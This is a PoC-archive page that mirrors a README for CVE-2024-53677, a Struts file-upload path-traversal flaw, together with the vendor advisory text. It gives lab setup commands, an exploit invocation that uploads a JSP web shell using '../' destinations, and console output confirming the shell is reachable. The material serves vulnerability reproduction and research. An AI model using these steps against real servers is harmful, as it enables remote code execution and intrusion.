Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-53677 PoC — Apache Struts: Mixing setters for uploaded files and normal fields can allow bypass file upload checks

Source
https://github.com/SeanRickerd/CVE-2024-53677
Associated Vulnerability
Title:Apache Struts: Mixing setters for uploaded files and normal fields can allow bypass file upload checks (CVE-2024-53677)
Description:File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. This issue affects Apache Struts: from 2.0.0 before 6.4.0. Users are recommended to upgrade to version 6.4.0 at least and migrate to the new file upload mechanism https://struts.apache.org/core-developers/file-upload . If you are not using an old file upload logic based on FileuploadInterceptor your application is safe. You can find more details in  https://cwiki.apache.org/confluence/display/WW/S2-067
Description
Vulnerable Environment and Exploit for CVE-2024-53677
Readme
 CVE-2024-53677 - Apache Struts 2 Remote Code Execution Vulnerability (RCE) Reproduction Environment

This repository provides a container-based environment to reproduce the CVE-2024-53677 vulnerability in Apache Struts 2. This vulnerability involves path traversal and allows for arbitrary code execution (RCE) through the file upload functionality in Struts 2.

## Setup Instructions

The environment can be built and run using Podman. Follow these steps to set up the application:

```sh[
git clone https://github.com/seanrickerd/CVE-2024-53677.git
cd CVE-2024-53677 
podman build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
podman run -d -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677
```
Running the exploit: 

```sh
pip install -r requirements.txt
python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files newshell.jsp --destination ../newshell.jsp
```
There is an intermittent issue where the file will upload properly but will not be accessible. To work around this, you will need to add an extra . to the destination, then re-run the original command. 

```sh
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination ../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: ../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/shell.jsp
[INFO] File not accessible. HTTP Status: 404
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination .../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: .../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/.../shell.jsp
[INFO] File not accessible. HTTP Status: 404
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination ../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: ../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/shell.jsp
[ALERT] File uploaded and accessible: http://localhost:8080/shell.jsp
```
The shell will be accessible via a browser at http://localhost:8080/shell.jsp
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →